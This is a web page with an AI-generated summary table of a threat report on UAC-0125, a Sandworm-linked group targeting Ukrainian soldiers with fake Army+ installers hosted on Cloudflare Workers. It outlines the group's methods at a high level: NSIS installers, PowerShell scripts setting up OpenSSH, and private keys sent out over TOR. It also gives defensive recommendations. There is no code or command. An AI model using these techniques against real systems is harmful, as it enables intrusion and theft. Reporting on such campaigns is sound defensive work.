| Category | Details |
|---|---|
| Threat Actors | UAC-0125 (linked to APT44, FROZENBARENTS, Sandworm, Seashell Blizzard, Voodoo Bear, GRU Unit 74455). |
| Campaign Overview | UAC-0125 targets Ukrainian military personnel with fake Cloudflare Workers websites hosting malware disguised as the legitimate Army+ app. |
| Target Regions/Victims | Ukrainian military personnel. |
| Methodology | Malware disguised as an Army+ installer; PowerShell scripts for remote access using RSA key manipulation; private keys exfiltrated via TOR. |
| Product Targeted | Army+ app for military personnel. |
| Malware Reference | Fake Army+ installer leveraging NSIS; PowerShell script for OpenSSH installation and RSA key generation. |
| Tools Used | NSIS, PowerShell scripts, TOR anonymity network. |
| Vulnerabilities Exploited | Abuse of Cloudflare Workers for hosting malicious content. |
| TTPs | Phishing using legitimate services; remote access via OpenSSH; private key exfiltration through TOR. |
| Attribution | GRU Unit 74455 (Russian Federation); linked to broader APT activities by UAC-0125. |
| Recommendations | Increase monitoring of Cloudflare services, enhance endpoint protection, restrict unknown PowerShell activities, and educate military personnel on phishing risks. |
| Source | The Hackers News |
Read full article: https://thehackernews.com/2024/12/uac-0125-abuses-cloudflare-workers-to.html
The above summary has been generated by an AI language model
Leave a Reply